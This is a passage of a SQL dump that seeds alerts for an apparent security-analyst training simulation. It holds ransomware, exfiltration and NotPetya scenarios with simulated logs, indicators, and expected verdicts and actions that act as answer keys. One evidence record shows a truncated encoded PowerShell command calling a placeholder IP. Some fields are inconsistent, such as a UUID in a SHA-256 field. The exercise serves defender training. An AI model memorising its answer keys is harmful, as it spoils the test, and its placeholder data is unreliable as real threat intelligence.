4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:35Z\\\",\\\"event_id\\\":\\\"4698\\\",\\\"event_source\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"task_name\\\":\\\"\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\RansomwareTask\\\",\\\"task_action\\\":\\\"Create\\\",\\\"task_user\\\":\\\"SYSTEM\\\",\\\"trigger_type\\\":\\\"AtStartup\\\",\\\"action_type\\\":\\\"Execute\\\",\\\"action_command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\ransomware.exe\\\",\\\"action_arguments\\\":\\\"/silent\\\",\\\"launcher_ip\\\":\\\"192.168.1.55\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"binary_sha256\\\":\\\"3fa85f64-5717-4562-b3fc-2c963f66afa6\\\",\\\"username\\\":\\\"compromised_user\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(973, 'Lateral Movement Detected Across Network - Step 4', 'high', 'Network Traffic Analysis', 'An attacker is using stolen credentials to move laterally across the network, aiming to spread ransomware by encrypting files on additional systems.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"source_ip\":\"10.20.30.40\",\"destination_ip\":\"192.168.1.15\",\"external_attacker_ip\":\"203.0.113.45\",\"username\":\"j.doe\",\"action\":\"login\",\"status\":\"success\",\"file_accessed\":\"C:\\\\Users\\\\Public\\\\Documents\\\\confidential.txt\",\"malware_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"protocol\":\"SMB\",\"event_id\":4624,\"logon_type\":3,\"description\":\"Successful network logon using SMB protocol with stolen credentials.\"}', '2026-01-17 03:39:18', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.20.30.40\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP involved in lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP targeted by lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activity.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Credentials potentially compromised.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known 
ransomware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(974, 'Data Exfiltration Alert Triggered', 'critical', 'Data Loss Prevention (DLP) System', 'The DLP system detected an attempt to exfiltrate sensitive data from an internal host to an external server, which could precede data encryption by the attacker.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:25:30Z\",\"event_id\":\"EXFIL-20231005-1245\",\"source_ip\":\"10.0.1.15\",\"destination_ip\":\"203.0.113.50\",\"filename\":\"confidential_data.zip\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"username\":\"j.doe\",\"protocol\":\"HTTPS\",\"action\":\"blocked\",\"message\":\"Attempted data exfiltration detected and blocked by DLP system.\"}', '2026-01-17 03:39:18', '2026-02-16 17:52:49', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address associated with previous data breaches.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Filename suggests sensitive data potentially targeted for exfiltration.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash_database\",\"verdict\":\"malicious\",\"details\":\"Hash linked to known data exfiltration malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"clean\",\"details\":\"Employee username involved in the data exfiltration 
attempt.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.663Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:25:30Z\\\",\\\"event_id\\\":\\\"EXFIL-20231005-1245\\\",\\\"source_ip\\\":\\\"10.0.1.15\\\",\\\"destination_ip\\\":\\\"203.0.113.50\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"username\\\":\\\"j.doe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"message\\\":\\\"Attempted data exfiltration detected and blocked by DLP system.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.663Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:25:30Z\\\",\\\"event_id\\\":\\\"EXFIL-20231005-1245\\\",\\\"source_ip\\\":\\\"10.0.1.15\\\",\\\"destination_ip\\\":\\\"203.0.113.50\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"username\\\":\\\"j.doe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"message\\\":\\\"Attempted data exfiltration detected and blocked by DLP system.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.663Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:25:30Z\\\",\\\"event_id\\\":\\\"EXFIL-20231005-1245\\\",\\\"source_ip\\\":\\\"10.0.1.15\\\",\\\"destination_ip\\\":\\\"203.0.113.50\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"username\\\":\\\"j.doe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"message\\\":\\\"Attempted data exfiltration detected and blocked by DLP system.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.663Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:25:30Z\\\",\\\"event_id\\\":\\\"EXFIL-20231005-1245\\\",\\\"source_ip\\\":\\\"10.0.1.15\\\",\\\"destination_ip\\\":\\\"203.0.113.50\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"username\\\":\\\"j.doe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"message\\\":\\\"Attempted data exfiltration detected and blocked by DLP system.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.663Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:25:30Z\\\",\\\"event_id\\\":\\\"EXFIL-20231005-1245\\\",\\\"source_ip\\\":\\\"10.0.1.15\\\",\\\"destination_ip\\\":\\\"203.0.113.50\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"username\\\":\\\"j.doe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"message\\\":\\\"Attempted data exfiltration detected and blocked by DLP system.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(975, 'Ransom Note Discovered', 'critical', 'Affected System Files', 'A ransom note was discovered on the affected system, indicating a demand for payment to receive decryption keys. The note challenges the company to decide whether to pay the ransom or restore data from backups. The presence of this note indicates that encryption has likely occurred, and immediate actions are necessary to prevent further damage.', 'Impact', 'T1486: Data Encrypted for Impact', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:22:56Z\",\"event_type\":\"file_created\",\"hostname\":\"compromised-device.local\",\"username\":\"jdoe\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\Documents\\\\RANSOM_NOTE.txt\",\"file_hash\":\"3fa4d8e5a9fbb2c4d9c8e3cbe8d8d3e7\",\"attacker_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.105\",\"note_content\":\"Your files have been encrypted! Pay 1 Bitcoin to receive the decryption keys.\",\"associated_malicious_file\":\"encryptor.exe\",\"malicious_file_hash\":\"b1946ac92492d2347c6235b4d2611184\"}', '2026-01-17 03:39:18', '2026-02-16 17:52:58', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"filename\",\"value\":\"C:\\\\Users\\\\jdoe\\\\Documents\\\\RANSOM_NOTE.txt\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Ransom note file indicating encryption of files.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3fa4d8e5a9fbb2c4d9c8e3cbe8d8d3e7\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known ransom notes.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"IP address linked to ransomware 
operations.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash related to the encryption malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.664Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:56Z\\\",\\\"event_type\\\":\\\"file_created\\\",\\\"hostname\\\":\\\"compromised-device.local\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\Documents\\\\\\\\RANSOM_NOTE.txt\\\",\\\"file_hash\\\":\\\"3fa4d8e5a9fbb2c4d9c8e3cbe8d8d3e7\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"note_content\\\":\\\"Your files have been encrypted! 
Pay 1 Bitcoin to receive the decryption keys.\\\",\\\"associated_malicious_file\\\":\\\"encryptor.exe\\\",\\\"malicious_file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.664Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:56Z\\\",\\\"event_type\\\":\\\"file_created\\\",\\\"hostname\\\":\\\"compromised-device.local\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\Documents\\\\\\\\RANSOM_NOTE.txt\\\",\\\"file_hash\\\":\\\"3fa4d8e5a9fbb2c4d9c8e3cbe8d8d3e7\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"note_content\\\":\\\"Your files have been encrypted! Pay 1 Bitcoin to receive the decryption keys.\\\",\\\"associated_malicious_file\\\":\\\"encryptor.exe\\\",\\\"malicious_file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.664Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:56Z\\\",\\\"event_type\\\":\\\"file_created\\\",\\\"hostname\\\":\\\"compromised-device.local\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\Documents\\\\\\\\RANSOM_NOTE.txt\\\",\\\"file_hash\\\":\\\"3fa4d8e5a9fbb2c4d9c8e3cbe8d8d3e7\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"note_content\\\":\\\"Your files have been encrypted! 
Pay 1 Bitcoin to receive the decryption keys.\\\",\\\"associated_malicious_file\\\":\\\"encryptor.exe\\\",\\\"malicious_file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.664Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:56Z\\\",\\\"event_type\\\":\\\"file_created\\\",\\\"hostname\\\":\\\"compromised-device.local\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\Documents\\\\\\\\RANSOM_NOTE.txt\\\",\\\"file_hash\\\":\\\"3fa4d8e5a9fbb2c4d9c8e3cbe8d8d3e7\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"note_content\\\":\\\"Your files have been encrypted! Pay 1 Bitcoin to receive the decryption keys.\\\",\\\"associated_malicious_file\\\":\\\"encryptor.exe\\\",\\\"malicious_file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.664Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:56Z\\\",\\\"event_type\\\":\\\"file_created\\\",\\\"hostname\\\":\\\"compromised-device.local\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\Documents\\\\\\\\RANSOM_NOTE.txt\\\",\\\"file_hash\\\":\\\"3fa4d8e5a9fbb2c4d9c8e3cbe8d8d3e7\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"note_content\\\":\\\"Your files have been encrypted! Pay 1 Bitcoin to receive the decryption keys.\\\",\\\"associated_malicious_file\\\":\\\"encryptor.exe\\\",\\\"malicious_file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(976, 'Initial Network Breach Detected', 'critical', 'Firewall logs', 'A breach was detected through a compromised software update, indicative of a supply chain attack. This aligns with Sandworm\'s known tactics of targeting critical infrastructures using destructive methods. The initial access was likely aimed at causing widespread disruption in Maersk\'s network.', 'Destructive Attack', 'T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:22:31Z\",\"event\":\"network_connection\",\"source_ip\":\"5.188.86.123\",\"destination_ip\":\"192.168.1.10\",\"firewall_action\":\"allow\",\"protocol\":\"TCP\",\"destination_port\":443,\"file_name\":\"update_software_v1.4.exe\",\"file_hash\":\"b6f6f1c4abc1234f7d1e9b0c8e5d9a1a\",\"user\":\"system_update\",\"event_id\":\"FW123456789\"}', '2026-01-17 03:39:49', '2026-02-16 17:51:49', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"5.188.86.123\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Sandworm APT group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of Maersk\'s network.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"update_software_v1.4.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"File associated with the initial breach through a compromised update.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b6f6f1c4abc1234f7d1e9b0c8e5d9a1a\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware used by 
Sandworm.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(977, 'Malware Execution and Spread - NotPetya Detected', 'critical', 'Endpoint detection systems', 'The NotPetya malware has been executed on the network, identified through rapid spreading and data wiping across multiple systems. Immediate containment and analysis are required to prevent further damage.', 'Wiper Malware', 'T1485 - Data Destruction', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"evt-4567\",\"source_ip\":\"185.92.220.45\",\"destination_ip\":\"192.168.1.25\",\"hostname\":\"workstation-01\",\"username\":\"jdoe\",\"malware_name\":\"NotPetya\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\notpetya.exe\",\"file_hash\":\"71c4025dd989b0c6b9b3ed6e5b4c3b5d\",\"action\":\"executed\",\"status\":\"success\"}', '2026-01-17 03:39:49', '2026-02-16 17:51:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with Sandworm operations\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Compromised endpoint\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"C:\\\\Windows\\\\System32\\\\notpetya.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint detection systems\",\"verdict\":\"malicious\",\"details\":\"Known NotPetya executable\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"71c4025dd989b0c6b9b3ed6e5b4c3b5d\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Report\",\"verdict\":\"malicious\",\"details\":\"Hash associated with NotPetya\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(978, 'Unexpected Resilience Point Discovered', 'high', 'Domain controller logs from Ghana', 'During the recovery process, an unexpected resilience point was identified in a domain controller located in Ghana. This controller played a crucial role in enabling Maersk\'s recovery efforts, emphasizing the significance of maintaining offline backups. The threat actor, Sandworm, known for destructive attacks, was involved in the incident.', 'Incident Response', 'T1485: Data Destruction', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T08:34:56Z\",\"event_source\":\"domain_controller\",\"location\":\"Ghana\",\"internal_ip\":\"10.25.36.48\",\"external_ip\":\"203.0.113.45\",\"username\":\"admin.ghana\",\"filename\":\"notpetya_recovery_tool.exe\",\"hash\":\"71b6a493388e7d0b6e1c8fbe5c0c4b5b\",\"action\":\"file_restored\",\"status\":\"success\"}', '2026-01-17 03:39:49', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known Sandworm activity\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"71b6a493388e7d0b6e1c8fbe5c0c4b5b\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"suspicious\",\"details\":\"Hash linked to NotPetya recovery operations\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin.ghana\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Legitimate domain admin account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.668Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:34:56Z\\\",\\\"event_source\\\":\\\"domain_controller\\\",\\\"location\\\":\\\"Ghana\\\",\\\"internal_ip\\\":\\\"10.25.36.48\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"admin.ghana\\\",\\\"filename\\\":\\\"notpetya_recovery_tool.exe\\\",\\\"hash\\\":\\\"71b6a493388e7d0b6e1c8fbe5c0c4b5b\\\",\\\"action\\\":\\\"file_restored\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.668Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:34:56Z\\\",\\\"event_source\\\":\\\"domain_controller\\\",\\\"location\\\":\\\"Ghana\\\",\\\"internal_ip\\\":\\\"10.25.36.48\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"admin.ghana\\\",\\\"filename\\\":\\\"notpetya_recovery_tool.exe\\\",\\\"hash\\\":\\\"71b6a493388e7d0b6e1c8fbe5c0c4b5b\\\",\\\"action\\\":\\\"file_restored\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.668Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:34:56Z\\\",\\\"event_source\\\":\\\"domain_controller\\\",\\\"location\\\":\\\"Ghana\\\",\\\"internal_ip\\\":\\\"10.25.36.48\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"admin.ghana\\\",\\\"filename\\\":\\\"notpetya_recovery_tool.exe\\\",\\\"hash\\\":\\\"71b6a493388e7d0b6e1c8fbe5c0c4b5b\\\",\\\"action\\\":\\\"file_restored\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.668Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:34:56Z\\\",\\\"event_source\\\":\\\"domain_controller\\\",\\\"location\\\":\\\"Ghana\\\",\\\"internal_ip\\\":\\\"10.25.36.48\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"admin.ghana\\\",\\\"filename\\\":\\\"notpetya_recovery_tool.exe\\\",\\\"hash\\\":\\\"71b6a493388e7d0b6e1c8fbe5c0c4b5b\\\",\\\"action\\\":\\\"file_restored\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.668Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 